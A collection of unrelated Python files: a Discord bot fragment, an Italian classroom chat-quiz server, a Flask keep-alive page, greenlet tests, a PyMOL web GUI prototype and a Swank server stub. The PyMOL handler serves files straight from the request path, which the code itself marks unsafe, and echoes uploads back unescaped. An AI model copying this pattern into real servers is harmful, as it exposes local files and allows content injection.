:param prefix: The new prefix for the bot. """ logger.info("Receiving setPrefix command") self.bot.command_prefix = prefix self.bot.get_cog('DatabaseCog').updateValue("prefix", prefix) logger.info(f"Successfully set the prefix to {prefix}") await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.') @setChannel.error async def setChannelError(self, ctx, error): """ Error Handler for setChannel. :param ctx: The context. :param error: The error raised. """ logger.error(f"Error when setting the channel: {error.args[0]}") await ctx.send(error.args[0]) @tasks.loop(hours=3) async def updateMalProfileLoop(self): """ Loop that periodically updates the MAL account, i.e. update watching/reading list. """ if self.malUser: thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],)) thread.start() else: logger.error("Cannot update MAL profile, profile is not set")
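_updateMALProfile reports progress by pointing tqdm at an io.StringIO buffer, which getProfile() later reads back and embeds in a Discord message. A standalone sketch of that trick, with time.sleep standing in for the Jikan API calls:

import io
import time
from tqdm import tqdm

buffer = io.StringIO()
bar = tqdm(total=5, file=buffer, ncols=40,
           bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]")

for _ in range(5):
    time.sleep(0.1)            # placeholder for one API call per list entry
    buffer.truncate(0)         # drop the previous rendering of the bar
    buffer.seek(0)
    bar.update()
    print(buffer.getvalue())   # what the bot would show in the embed
bar.close()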
chat_server.py
#!/usr/bin/env python3
"""Python script: multithreaded server for the pirate-ship chat game (Chatgame - Nave pirata).
Programmazione di Reti course - Università di Bologna"""
import sys
import random as rnd
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
from time import sleep
from collections import defaultdict


def server_func(host, port):
    """ Function that accepts incoming client connections."""
    def accept_incoming_connections():
        while playing:
            client, client_address = SERVER.accept()
            print("%s:%s si è collegato." % client_address)
            if(not roles):
                # Tell the client that no roles are available at the moment
                client.send(bytes(prefix + "Al momento non ci sono più ruoli disponibili, riprovo tra poco...", "utf8"))
                # Tell the client that it has to quit
                client.send(bytes("\n{quit}", "utf8"))
                # Close the client socket
                client.close()
                print("%s:%s è uscito." % client_address)
                sleep(5)
                continue
            client.send(bytes(prefix + "Benvenuto nella nave!", "utf8"))
            # Use a dictionary to register the clients
            addresses[client] = client_address
            # Start a Thread - one for each client
            Thread(target=handle_client, args=(client,)).start()

    """ Function that handles the connection of a single client."""
    def handle_client(client):  # Takes the client socket as the function argument.
        # Pick a role at random and remove it from the list of available roles
        role = rnd.choice(roles)
        roles.remove(role)
        # Send the role to the client
        client.send(bytes(prefix + "Il tuo ruolo è : %s." % role, "utf8"))
        # Update the clients dictionary
        clients[client] = role
        # Give the client its initial score (0)
        scores[client] = 0
        # Notify all connected clients that a new role has been assigned
        broadcast("%s si è unito!" % role)
        # Keep quizzing the client until it is eliminated or the time runs out
        while(playing and client in scores):
            quiz(client)
        # If the time is up, leave the function
        if not playing:
            return
        # The client left the loop and the time is not up, which means
        # it has been eliminated...
        # Wait a little before expelling it
        sleep(3)
        # Tell the client that it has to quit
        client.send(bytes("\n{quit}", "utf8"))
        # Close the client socket
        client.close()
        print("%s:%s uscito." % (addresses[client]))
        # Remove the client from the various dictionaries
        del addresses[client]
        del clients[client]
        # Tell everyone that the client has been eliminated
        broadcast("%s è uscito." % role)
        # Make the role of the expelled client available again
        roles.append(role)

    ''' Function that runs the quiz for the client '''
    def quiz(client):
        menu = "Scegli una delle opzioni: 1 2 3"
        # Ask for a menu choice
        client.send(bytes(prefix + menu, "utf8"))
        valid = False  # Boolean telling whether the client input is valid
        while(not valid):
            # Wait to receive the choice from the client
            choice = client.recv(BUFSIZ).decode("utf8")
            # Check whether the input is valid
            if choice and (choice[0] == '1' or choice[0] == '2' or choice[0] == '3'):
                # rnd.shuffle(options)  # Shuffle the list with the 3 options
                option = get_options()[int(choice[0]) - 1]
                valid = True
            elif choice == "{quit}":
                # The client asked to disconnect
                option = "Uscita in corso..."
                valid = True
            else:
                # If the input is not valid, send the menu with the request again
                option = "Input non valido. " + menu
            # Send the chosen option to the client, or ask again with the menu
            client.send(bytes(prefix + option, "utf8"))
        # If one of the questions was chosen, check the answer
        if(option in answers):
            check_answer(client, option)
        else:
            # The client picked the trick option --> expel it
            del scores[client]

    ''' Function that checks whether the client answers the given question correctly '''
    def check_answer(client, question):
        # Make sure it really is one of the questions
        if (question in questions):
            # Ask the client for the answer to the question
            answer = client.recv(BUFSIZ).decode("utf8")
            if answer == answers[question]:
                result = "Indovinato! Hai guadagnato un punto!"
                point = 1
            elif answer == "{quit}":
                # The client asked to disconnect: remove it and stop here
                del scores[client]
                return
            else:
                result = "Sbagliato! Hai perso un punto!"
                point = -1
            # Send the client the outcome of its answer
            client.send(bytes(prefix + result, "utf8"))
            # Increase or decrease the client score according to the answer given
            scores[client] += point

    """ Function the Server uses to broadcast a message to every client."""
    def broadcast(msg):
        for utente in clients:
            utente.send(bytes("\n" + msg, "utf8"))

    ''' Timer function '''
    def countdown(timer):
        if(timer < 0):
            print("Valore timer negativo")
            exit()
        while timer > -1:
            print(timer)
            sleep(1)
            timer -= 1

    ''' Function returning the list of keys holding the maximum value of a dictionary '''
    def get_max_value(data):
        if not data:  # Empty dictionary
            return []
        d = defaultdict(list)  # Auxiliary dictionary to fill
        for key, value in data.items():  # Build a dictionary keyed by the values
            d[value].append(key)
        return max(d.items())[1]  # Keep only the keys with the maximum value

    ''' Function returning the list of winning roles '''
    def get_winners():
        winner_list = []
        for v in get_max_value(scores):  # Take the clients with the highest score
            winner_list.append(clients[v])  # and put their roles in a list
        return winner_list

    ''' Function returning the list of the 3 menu choices '''
    def get_options():
        # Draw two questions at random
        o = [rnd.choice(questions), rnd.choice(questions), trick]
        rnd.shuffle(o)  # Shuffle the list
        return o

    clients = {}  # Dictionary storing the role of each client
    addresses = {}  # Dictionary storing the address of each client
    scores = {}  # Dictionary storing the score of each client

    HOST = host  # From input
    PORT = port  # From input
    BUFSIZ = 1024
    ADDR = (HOST, PORT)
    # Create the server socket for the TCP connection
    SERVER = socket(AF_INET, SOCK_STREAM)
    # Bind the socket to the address given in input
    SERVER.bind(ADDR)
    # Prefix of the Server messages in the client chats
    prefix = "\nMaster(Server):"
    # List of the available roles
    roles = ["Il Capitano", "Lo Spadaccino", "Il Navigatore", "Il Cecchino", "Il Cuoco",
             "Il Dottore", "L'Archeologo", "Il Carpentiere", "Il Musicista", "Il Timoniere"]
    # Prefix for the quiz questions
    pre_domanda = "Domanda(Rispondi con la lettera selezionata) - "
    q1 = pre_domanda + "Come si chiama questo corso?\n---------a)Programmazione di Reti\n---------b)Basi di Dati\n---------c)Sistemi Operativi"
    q2 = pre_domanda + "Quanti CFU ha questo corso?\n---------a)3CFU\n---------b)6CFU\n---------c)9CFU"
    q3 = pre_domanda + "Il linguaggio scelto per il laboratorio è:\n---------a)C#\n---------b)Python\n---------c)Java"
    q4 = pre_domanda + "Quali sono i professori di questo corso?\n---------a)Mirko Viroli-Pianini Danilo\n---------b)Maio Dario-Franco Annalisa\n---------c)Pau Giovanni- Piroddi Andrea"
    q5 = pre_domanda + "Le lezioni del corso sono state svolte sulla piattaforma:\n---------a)Teams\n---------b)Zoom\n---------c)Meet"
    # List containing the questions
    questions = [q1, q2, q3, q4, q5]
    # Dictionary mapping each question to its correct answer
    answers = {q1: "a", q2: "b", q3: "b", q4: "c", q5: "a"}
    # Trick option
    trick = "Trabocchetto - Sei eliminato!"
    # Game time
    timer = 100
    # Boolean telling whether the game is still running or not (time expired)
    playing = True

    SERVER.listen(5)
    print("In attesa di connessioni...")
    # Thread in which the Server accepts the clients that connect
    ACCEPT_THREAD = Thread(target=accept_incoming_connections)
    ACCEPT_THREAD.start()
    TIMER_THREAD = Thread(target=countdown, args=(timer,))
    TIMER_THREAD.start()
    TIMER_THREAD.join()  # Wait for the timer thread to finish
    playing = False  # Time is up
    print("Timer finito")
    broadcast(prefix + "Tempo Scaduto!")
    SERVER.close()  # Close the server

    # ----- Compute the winners
    winners = get_winners()
    # Send the appropriate message depending on the number of winners
    if(not winners):
        final_msg = "Non ci sono vincitori"
    elif(len(winners) == 1):
        final_msg = ("Il vincitore è " + winners[0])
    else:
        final_msg = "I vincitori sono " + ', '.join(winners)
    # Announce the winners
    print(final_msg)
    broadcast(prefix + final_msg)


# Print a warning message in case someone tries to run this module
# as a normal script
if __name__ == "__main__":
    print("File non eseguibile")
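# A minimal client sketch for the server above (an assumption: the original project
# presumably ships its own client script; this one only illustrates the wire protocol
# visible in server_func - plain UTF-8 text, 1024-byte reads and the literal "{quit}"
# sentinel). The host and port are placeholders, since server_func receives them from
# its caller.
import sys
from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread


def receive(sock):
    while True:
        msg = sock.recv(1024).decode("utf8")
        if not msg or "{quit}" in msg:
            print("Disconnected by the server.")
            sock.close()
            break
        print(msg)


if __name__ == "__main__":
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect(("localhost", 53000))  # assumed address
    Thread(target=receive, args=(sock,), daemon=True).start()
    try:
        for line in sys.stdin:
            sock.send(bytes(line.strip(), "utf8"))
    except OSError:
        pass  # socket already closed by the receive thread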
webserver.py
# -- Importing Packages -- # from flask import Flask from threading import Thread from logging import getLogger, ERROR # -- Disables Flask App Logging -- # log = getLogger('werkzeug') log.setLevel(ERROR) # - Webserver Setup -- # app = Flask('') @app.route('/') def home(): return '<h1> Hosting Active </h1><p>This bot is made by RLX, So make sure to credit RLX/RLX Team</p><p>Join the discord server now - https://discord.gg/SN3mZPxjEW</p>' def run(): app.run(host='0.0.0.0', port=8080) def keep_alive(): t = Thread(target=run) t.start()
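# Usage sketch (assumption: webserver.py is imported from a separate main script, here
# called main.py, that runs a long-lived bot; keep_alive() starts the Flask thread on
# port 8080 so an external uptime pinger can reach "/", while the caller continues into
# its own blocking loop).
from webserver import keep_alive
import time


def run_bot():
    # placeholder for the real blocking loop, e.g. a Discord bot's run(TOKEN)
    while True:
        time.sleep(60)


if __name__ == "__main__":
    keep_alive()  # non-blocking: the Flask server runs in its own thread
    run_bot()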
test_greenlet.py
import gc import sys import time import threading import unittest from abc import ABCMeta, abstractmethod from greenlet import greenlet class SomeError(Exception): pass def fmain(seen): try: greenlet.getcurrent().parent.switch() except: seen.append(sys.exc_info()[0]) raise raise SomeError def send_exception(g, exc): # note: send_exception(g, exc) can be now done with g.throw(exc). # the purpose of this test is to explicitely check the propagation rules. def crasher(exc): raise exc g1 = greenlet(crasher, parent=g) g1.switch(exc) class GreenletTests(unittest.TestCase): def test_simple(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() lst.append(3) g = greenlet(f) lst.append(0) g.switch() lst.append(2) g.switch() lst.append(4) self.assertEqual(lst, list(range(5))) def test_parent_equals_None(self): g = greenlet(parent=None) self.assertIsNotNone(g) self.assertIs(g.parent, greenlet.getcurrent()) def test_run_equals_None(self): g = greenlet(run=None) self.assertIsNotNone(g) self.assertIsNone(g.run) def test_two_children(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() lst.extend([1, 1]) g = greenlet(f) h = greenlet(f) g.switch() self.assertEqual(len(lst), 1) h.switch() self.assertEqual(len(lst), 2) h.switch() self.assertEqual(len(lst), 4) self.assertEqual(h.dead, True) g.switch() self.assertEqual(len(lst), 6) self.assertEqual(g.dead, True) def test_two_recursive_children(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() def g(): lst.append(1) g = greenlet(f) g.switch() lst.append(1) g = greenlet(g) g.switch() self.assertEqual(len(lst), 3) self.assertEqual(sys.getrefcount(g), 2) def test_threads(self): success = [] def f(): self.test_simple() success.append(True) ths = [threading.Thread(target=f) for i in range(10)] for th in ths: th.start() for th in ths: th.join() self.assertEqual(len(success), len(ths)) def test_exception(self): seen = [] g1 = greenlet(fmain) g2 = greenlet(fmain) g1.switch(seen) g2.switch(seen) g2.parent = g1 self.assertEqual(seen, []) self.assertRaises(SomeError, g2.switch) self.assertEqual(seen, [SomeError]) g2.switch() self.assertEqual(seen, [SomeError]) def test_send_exception(self): seen = [] g1 = greenlet(fmain) g1.switch(seen) self.assertRaises(KeyError, send_exception, g1, KeyError) self.assertEqual(seen, [KeyError]) def test_dealloc(self): seen = [] g1 = greenlet(fmain) g2 = greenlet(fmain) g1.switch(seen) g2.switch(seen) self.assertEqual(seen, []) del g1 gc.collect() self.assertEqual(seen, [greenlet.GreenletExit]) del g2 gc.collect() self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit]) def test_dealloc_other_thread(self): seen = [] someref = [] lock = threading.Lock() lock.acquire() lock2 = threading.Lock() lock2.acquire() def f(): g1 = greenlet(fmain) g1.switch(seen) someref.append(g1) del g1 gc.collect() lock.release() lock2.acquire() greenlet() # trigger release lock.release() lock2.acquire() t = threading.Thread(target=f) t.start() lock.acquire() self.assertEqual(seen, []) self.assertEqual(len(someref), 1) del someref[:] gc.collect() # g1 is not released immediately because it's from another thread self.assertEqual(seen, []) lock2.release() lock.acquire() self.assertEqual(seen, [greenlet.GreenletExit]) lock2.release() t.join() def test_frame(self): def f1(): f = sys._getframe(0) # pylint:disable=protected-access self.assertEqual(f.f_back, None) greenlet.getcurrent().parent.switch(f) return "meaning of life" g = greenlet(f1) frame = g.switch() self.assertTrue(frame 
is g.gr_frame) self.assertTrue(g) from_g = g.switch() self.assertFalse(g) self.assertEqual(from_g, "meaning of life") self.assertEqual(g.gr_frame, None) def test_thread_bug(self): def runner(x): g = greenlet(lambda: time.sleep(x)) g.switch() t1 = threading.Thread(target=runner, args=(0.2,)) t2 = threading.Thread(target=runner, args=(0.3,)) t1.start() t2.start() t1.join() t2.join() def test_switch_kwargs(self): def run(a, b): self.assertEqual(a, 4) self.assertEqual(b, 2) return 42 x = greenlet(run).switch(a=4, b=2) self.assertEqual(x, 42) def test_switch_kwargs_to_parent(self): def run(x): greenlet.getcurrent().parent.switch(x=x) greenlet.getcurrent().parent.switch(2, x=3) return x, x ** 2 g = greenlet(run) self.assertEqual({"x": 3}, g.switch(3)) self.assertEqual(((2,), {"x": 3}), g.switch()) self.assertEqual((3, 9), g.switch()) def test_switch_to_another_thread(self): data = {} error = None created_event = threading.Event() done_event = threading.Event() def run(): data["g"] = greenlet(lambda: None) created_event.set() done_event.wait() thread = threading.Thread(target=run) thread.start() created_event.wait() try: data["g"].switch() except greenlet.error: error = sys.exc_info()[1] self.assertIsNotNone(error, "greenlet.error was not raised!") done_event.set() thread.join() def test_exc_state(self): def f(): try: raise ValueError("fun") except: # pylint:disable=bare-except exc_info = sys.exc_info() greenlet(h).switch() self.assertEqual(exc_info, sys.exc_info()) def h(): self.assertEqual(sys.exc_info(), (None, None, None)) greenlet(f).switch() def test_instance_dict(self): def f(): greenlet.getcurrent().test = 42 def deldict(g): del g.__dict__ def setdict(g, value): g.__dict__ = value g = greenlet(f) self.assertEqual(g.__dict__, {}) g.switch() self.assertEqual(g.test, 42) self.assertEqual(g.__dict__, {"test": 42}) g.__dict__ = g.__dict__ self.assertEqual(g.__dict__, {"test": 42}) self.assertRaises(TypeError, deldict, g) self.assertRaises(TypeError, setdict, g, 42) def test_threaded_reparent(self): data = {} created_event = threading.Event() done_event = threading.Event() def run(): data["g"] = greenlet(lambda: None) created_event.set() done_event.wait() def blank(): greenlet.getcurrent().parent.switch() def setparent(g, value): g.parent = value thread = threading.Thread(target=run) thread.start() created_event.wait() g = greenlet(blank) g.switch() self.assertRaises(ValueError, setparent, g, data["g"]) done_event.set() thread.join() def test_deepcopy(self): import copy self.assertRaises(TypeError, copy.copy, greenlet()) self.assertRaises(TypeError, copy.deepcopy, greenlet()) def test_parent_restored_on_kill(self): hub = greenlet(lambda: None) main = greenlet.getcurrent() result = [] def worker(): try: # Wait to be killed main.switch() except greenlet.GreenletExit: # Resurrect and switch to parent result.append(greenlet.getcurrent().parent) result.append(greenlet.getcurrent()) hub.switch() g = greenlet(worker, parent=hub) g.switch() del g self.assertTrue(result) self.assertEqual(result[0], main) self.assertEqual(result[1].parent, hub) def test_parent_return_failure(self): # No run causes AttributeError on switch g1 = greenlet() # Greenlet that implicitly switches to parent g2 = greenlet(lambda: None, parent=g1) # AttributeError should propagate to us, no fatal errors self.assertRaises(AttributeError, g2.switch) def test_throw_exception_not_lost(self): class mygreenlet(greenlet): def __getattribute__(self, name): try: raise Exception() except: # pylint:disable=bare-except pass return 
greenlet.__getattribute__(self, name) g = mygreenlet(lambda: None) self.assertRaises(SomeError, g.throw, SomeError()) def test_throw_doesnt_crash(self): result = [] def worker(): greenlet.getcurrent().parent.switch() def creator(): g = greenlet(worker) g.switch() result.append(g) t = threading.Thread(target=creator) t.start() t.join() self.assertRaises(greenlet.error, result[0].throw, SomeError()) def test_recursive_startup(self): class convoluted(greenlet): def __init__(self): greenlet.__init__(self) self.count = 0 def __getattribute__(self, name): if name == "run" and self.count == 0: self.count = 1 self.switch(43) return greenlet.__getattribute__(self, name) def run(self, value): while True: self.parent.switch(value) g = convoluted() self.assertEqual(g.switch(42), 43) def test_unexpected_reparenting(self): another = [] def worker(): g = greenlet(lambda: None) another.append(g) g.switch() t = threading.Thread(target=worker) t.start() t.join() class convoluted(greenlet): def __getattribute__(self, name): if name == "run": self.parent = another[ 0 ] # pylint:disable=attribute-defined-outside-init return greenlet.__getattribute__(self, name) g = convoluted(lambda: None) self.assertRaises(greenlet.error, g.switch) def test_threaded_updatecurrent(self): # released when main thread should execute lock1 = threading.Lock() lock1.acquire() # released when another thread should execute lock2 = threading.Lock() lock2.acquire() class finalized(object): def __del__(self): # happens while in green_updatecurrent() in main greenlet # should be very careful not to accidentally call it again # at the same time we must make sure another thread executes lock2.release() lock1.acquire() # now ts_current belongs to another thread def deallocator(): greenlet.getcurrent().parent.switch() def fthread(): lock2.acquire() greenlet.getcurrent() del g[0] lock1.release() lock2.acquire() greenlet.getcurrent() lock1.release() main = greenlet.getcurrent() g = [greenlet(deallocator)] g[0].bomb = finalized() g[0].switch() t = threading.Thread(target=fthread) t.start() # let another thread grab ts_current and deallocate g[0] lock2.release() lock1.acquire() # this is the corner stone # getcurrent() will notice that ts_current belongs to another thread # and start the update process, which would notice that g[0] should # be deallocated, and that will execute an object's finalizer. Now, # that object will let another thread run so it can grab ts_current # again, which would likely crash the interpreter if there's no # check for this case at the end of green_updatecurrent(). This test # passes if getcurrent() returns correct result, but it's likely # to randomly crash if it's not anyway. 
self.assertEqual(greenlet.getcurrent(), main) # wait for another thread to complete, just in case t.join() def test_dealloc_switch_args_not_lost(self): seen = [] def worker(): # wait for the value value = greenlet.getcurrent().parent.switch() # delete all references to ourself del worker[0] initiator.parent = greenlet.getcurrent().parent # switch to main with the value, but because # ts_current is the last reference to us we # return immediately try: greenlet.getcurrent().parent.switch(value) finally: seen.append(greenlet.getcurrent()) def initiator(): return 42 # implicitly falls thru to parent worker = [greenlet(worker)] worker[0].switch() # prime worker initiator = greenlet(initiator, worker[0]) value = initiator.switch() self.assertTrue(seen) self.assertEqual(value, 42) def test_tuple_subclass(self): if sys.version_info[0] > 2: # There's no apply in Python 3.x def _apply(func, a, k): func(*a, **k) else: _apply = apply # pylint:disable=undefined-variable class mytuple(tuple): def __len__(self): greenlet.getcurrent().switch() return tuple.__len__(self) args = mytuple() kwargs = dict(a=42) def switchapply(): _apply(greenlet.getcurrent().parent.switch, args, kwargs) g = greenlet(switchapply) self.assertEqual(g.switch(), kwargs) def test_abstract_subclasses(self): AbstractSubclass = ABCMeta( "AbstractSubclass", (greenlet,), {"run": abstractmethod(lambda self: None)} ) class BadSubclass(AbstractSubclass): pass class GoodSubclass(AbstractSubclass): def run(self): pass GoodSubclass() # should not raise self.assertRaises(TypeError, BadSubclass) def test_implicit_parent_with_threads(self): if not gc.isenabled(): return # cannot test with disabled gc N = gc.get_threshold()[0] if N < 50: return # cannot test with such a small N def attempt(): lock1 = threading.Lock() lock1.acquire() lock2 = threading.Lock() lock2.acquire() recycled = [False] def another_thread(): lock1.acquire() # wait for gc greenlet.getcurrent() # update ts_current lock2.release() # release gc t = threading.Thread(target=another_thread) t.start() class gc_callback(object): def __del__(self): lock1.release() lock2.acquire() recycled[0] = True class garbage(object): def __init__(self): self.cycle = self self.callback = gc_callback() l = [] x = range(N * 2) current = greenlet.getcurrent() g = garbage() for _ in x: g = None # lose reference to garbage if recycled[0]: # gc callback called prematurely t.join() return False last = greenlet() if recycled[0]: break # yes! 
gc called in green_new l.append(last) # increase allocation counter else: # gc callback not called when expected gc.collect() if recycled[0]: t.join() return False self.assertEqual(last.parent, current) for g in l: self.assertEqual(g.parent, current) return True for _ in range(5): if attempt(): break class TestRepr(unittest.TestCase): def assertEndsWith(self, got, suffix): self.assertTrue(got.endswith(suffix), (got, suffix)) def test_main_while_running(self): r = repr(greenlet.getcurrent()) self.assertEndsWith(r, " current active started main>") def test_main_in_background(self): main = greenlet.getcurrent() def run(): return repr(main) g = greenlet(run) r = g.switch() self.assertEndsWith(r, " suspended active started main>") def test_initial(self): r = repr(greenlet()) self.assertEndsWith(r, " pending>") def test_main_from_other_thread(self): main = greenlet.getcurrent() class T(threading.Thread): original_main = thread_main = None main_glet = None def run(self): self.original_main = repr(main) self.main_glet = greenlet.getcurrent() self.thread_main = repr(self.main_glet) t = T() t.start() t.join(10) self.assertEndsWith(t.original_main, " suspended active started main>") self.assertEndsWith(t.thread_main, " current active started main>") r = repr(t.main_glet) # main greenlets, even from dead threads, never really appear dead # TODO: Can we find a better way to differentiate that? assert not t.main_glet.dead self.assertEndsWith(r, " suspended active started main>") def test_dead(self): g = greenlet(lambda: None) g.switch() self.assertEndsWith(repr(g), " dead>") self.assertNotIn("suspended", repr(g)) self.assertNotIn("started", repr(g)) self.assertNotIn("active", repr(g)) def test_formatting_produces_native_str(self): # https://github.com/python-greenlet/greenlet/issues/218 # %s formatting on Python 2 was producing unicode, not str. g_dead = greenlet(lambda: None) g_not_started = greenlet(lambda: None) g_cur = greenlet.getcurrent() for g in g_dead, g_not_started, g_cur: self.assertIsInstance("%s" % (g,), str) self.assertIsInstance( "%r" % (g,), str, ) if __name__ == "__main__": unittest.main()
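# A tiny standalone sketch (not one of the tests above) of the switch semantics the
# suite exercises: switch() carries a value into the target greenlet, and a greenlet
# that returns falls back to its parent, which then sees the return value and a dead
# greenlet.
from greenlet import greenlet


def child(value):
    # hand a result to the parent and wait to be resumed with a new value
    resumed_with = greenlet.getcurrent().parent.switch(value * 2)
    return resumed_with + 1


if __name__ == "__main__":
    g = greenlet(child)
    print(g.switch(10))  # 20: child started with 10 and switched 20 back
    print(g.switch(5))   # 6: child resumed with 5 and returned 5 + 1
    print(g.dead)        # True: the greenlet finished and fell back to main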
webgui01.py
try: import BaseHTTPServer except ImportError: import http.server as BaseHTTPServer import time import cgi import threading import traceback from pymol import cmd _server = None def _shutdown(self_cmd=cmd): if _server != None: _server.socket.close() self_cmd.quit() # Note, this handler assumes PyMOL is running as a global singleton def get_status(out, self_cmd=cmd): out.write('<html>\n') out.write('<header>\n') out.write('<script type="text/javascript" src="pymol.js"></script>\n') out.write('</header><body>\n') out.write('<h3>PyMOL WebGUI Proof of Concept</h3>\n') out.write('<table><tr>\n') out.write('<td><form action="./status.pymol"><button type="submit">Refresh</button></form></td>\n') out.write('<td><form target="_new" action="./ray.pymol?t=%f"><button type="submit">Ray</button></form></td>\n'% time.time()) out.write('<td><form target="_new" action="./monitor.pymol?t=%f"><button type="submit">Monitor</button></form></td>\n'% time.time()) out.write('<td><form action="./quit.pymol"><button type="submit">Quit</button></form></td>\n') out.write('</tr></table>') out.write('<a href="./status.pymol?load">load $TUT/1hpv.pdb</a>\n') names = self_cmd.get_names('objects') if not len(names): out.write('<p>No objects loaded.</p>\n') else: out.write('<p>Loaded Objects:</p><ul>\n') for name in names: out.write('<li>%s</li>\n'%name) out.write('</ul>\n') out.write('<a href="#" onClick="updateImage()"><img src="./draw.pymol?t=%f">'%time.time()+"</img></a>") out.write('</body></html>\n') def get_monitor(out, self_cmd=cmd): out.write('<html>\n') out.write('<header>\n') out.write('<script type="text/javascript" src="pymol.js"></script>\n') out.write('</header><body onload="monitorOnLoad()">\n') out.write('<img src="./draw.pymol?t=%f">'%time.time()+"</img>") out.write('</body></html>\n') def get_start(out, self_cmd=cmd): window_open="javascript: window.open('./status.pymol','hello', 'location=no,toolbar=no,width=400,height=600,top=0,left=880');" out.write('<html><body onload="'+window_open+'">\n') out.write('<a href="./start.pymol" onclick="'+window_open+'">Launch WebGUI\n') out.write('</body></html>') def write_image(out, ray=0, self_cmd=cmd): if ray: self_cmd.ray() # encode the file descriptor into the PNG filename if self_cmd.png(chr(1)+str(out.fileno()),prior=-1) != 1: # no prior image available, so wait for update / finish self_cmd.sync() class PymolHandler(BaseHTTPServer.BaseHTTPRequestHandler): def log_message(self, format, *args): pass # nuke logging feature for the time being def do_js(self): self.send_response(200) self.send_header('Content-type','text/javascript') self.end_headers() self.wfile.write(''' function updateImage() { images = document.getElementsByTagName("img"); for( var i = 0; i < images.length; i++ ) { images[i].src = "./draw.pymol?t=" + new Date().getTime(); } return false; } function monitorOnLoad(event) { setInterval('updateImage()',1000) } ''') def do_pymol(self): if "ray.pymol" in self.path: # send image self.send_response(200) self.send_header('Content-type', 'image/x-png') self.send_header('Cache-control', 'no-cache') self.send_header('Pragma', 'no-cache') self.end_headers() write_image(self.wfile,1) elif "draw.pymol" in self.path: self.send_response(200) self.send_header('Content-type', 'image/x-png') self.send_header('Cache-control', 'no-cache') self.send_header('Pragma', 'no-cache') self.end_headers() write_image(self.wfile) else: if "load" in self.path: # load a structure cmd.load("$TUT/1hpv.pdb") cmd.rock() self.send_response(200) self.send_header('Content-type', 
'text/html') self.end_headers() if "status.pymol" in self.path: get_status(self.wfile) elif "monitor.pymol" in self.path: get_monitor(self.wfile) elif "quit.pymol" in self.path: self.wfile.write('<html><body><p>Quitting...</p></body></html>') self.wfile.flush() _shutdown() else: # start page get_start(self.wfile) self.wfile.flush() def do_GET(self): try: doc = self.path.split('?')[0] if doc.endswith('.pymol'): # PyMOL try: self.do_pymol() except: traceback.print_exc() elif doc.endswith('.js'): # Javascript self.do_js() elif doc.endswith('.html'): f = open('.'+self.path) # UNSAFE!!! self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() self.wfile.write(f.read()) f.close() except IOError: self.send_error(404,'File Not Found: %s' % self.path) def do_POST(self): global rootnode try: ctype, pdict = cgi.parse_header(self.headers.getheader('content-type')) if ctype == 'multipart/form-data': query=cgi.parse_multipart(self.rfile, pdict) self.send_response(301) self.end_headers() upfilecontent = query.get('upfile') print("filecontent", upfilecontent[0]) self.wfile.write('<HTML>POST OK.<BR><BR>'); self.wfile.write(upfilecontent[0]); except : pass def main(): try: global _server _server = BaseHTTPServer.HTTPServer(('', 8080), PymolHandler) print('started httpserver...') _server.serve_forever() except KeyboardInterrupt: print('^C received, shutting down server') _server.socket.close() def open_browser(): import webbrowser time.sleep(1) webbrowser.open('http://localhost:8080/status.pymol') # import os # os.system('open http://localhost:8080/start.pymol') if __name__ == '__main__': main() if __name__ == 'pymol': cmd.set("image_copy_always") # copy all updates into image buffer t = threading.Thread(target=main) t.setDaemon(1) t.start() t = threading.Thread(target=open_browser) t.setDaemon(1) t.start() """ okay, what we need now is a simple safe way to pass comands and arguments through the client brower, with escape characters, etc. ideally, we'd like a javascript object which responds to the same messages as PyMOL for our initial test, let's just put up some button links to control representations. also outstanding: - how does one send asynchronous javascript URL requests? - we also need some way to package up images in PyMOL without passaging through the file systems - we also need to decide what this initial user interface is going to do """
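# Command-line smoke-test sketch for the handlers above (assumes PyMOL is serving this
# module on localhost:8080, as set up in main(); the two paths are the ones handled in
# do_pymol/do_GET). Python 3 urllib only; not part of the proof-of-concept itself.
from urllib.request import urlopen


def fetch(path):
    resp = urlopen("http://localhost:8080" + path)
    try:
        return resp.read()
    finally:
        resp.close()


if __name__ == "__main__":
    print(fetch("/status.pymol")[:200])      # first bytes of the HTML status page
    with open("snapshot.png", "wb") as out:  # current image buffer as PNG
        out.write(fetch("/draw.pymol?t=0"))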
server.py
# -*- coding: utf-8 -*- import logging import socket import sys from threading import Thread import logconfig from lisp import LispReader from protocol import SwankProtocol from repl import repl import ulisp try: import SocketServer as socketserver except ImportError: # Python 3 support import socketserver __all__ = ['HEADER_LENGTH', 'SwankServerRequestHandler', 'SwankServer', 'serve'] logconfig.configure() HEADER_LENGTH = 6 PROMPT = "ULISP> " LOCALS = {"__name__": "__console__", "__doc__": None} class SwankServerRequestHandler(socketserver.BaseRequestHandler): """Request handler for the SwankServer. Handle protocol requests from swank client by dispatching received data to SwankProtocol.dispatch and returns to the client whatever it replies. """ def __init__(self, request, client_address, server): encodings = { "iso-latin-1-unix": "latin-1", "iso-utf-8-unix": "utf-8" } self.encoding = encodings.get(server.encoding, "utf-8") self.protocol = SwankProtocol( server.socket, locals=LOCALS, prompt=PROMPT ) socketserver.BaseRequestHandler.__init__( self, request, client_address, server) def handle(self): logging.debug('handle') first = True while True: try: raw = self.request.recv(HEADER_LENGTH) logging.debug('raw()->"%s"', raw) if raw: length = int(raw, 16) else: logging.error('Empty header received') self.request.close() break; data = self.request.recv(length) logging.debug('recv()->"%s"', data) if first: ret = self.protocol.indentation_update() ret = ret.encode(self.encoding) logging.debug('send()->"%s"', ret) self.request.send(ret) data = data.decode(self.encoding) logging.debug('dispatching -> %s', data) ret = self.protocol.dispatch(data) logging.debug('dispatch -> %s', str(ret)) ret = ret.encode(self.encoding) self.request.send(ret) first = False except socket.timeout as e: logging.error('Socket error %s', str(e)) break class SwankServer(socketserver.TCPServer): """Good ol' TCPServer using SwankServerRequestHandler as handler.""" def __init__(self, server_address, handler_class=SwankServerRequestHandler, port_filename=None, encoding="utf-8"): self.port_filename = port_filename self.encoding = encoding server = socketserver.TCPServer.__init__(self, server_address, handler_class) ipaddr, port = self.server_address 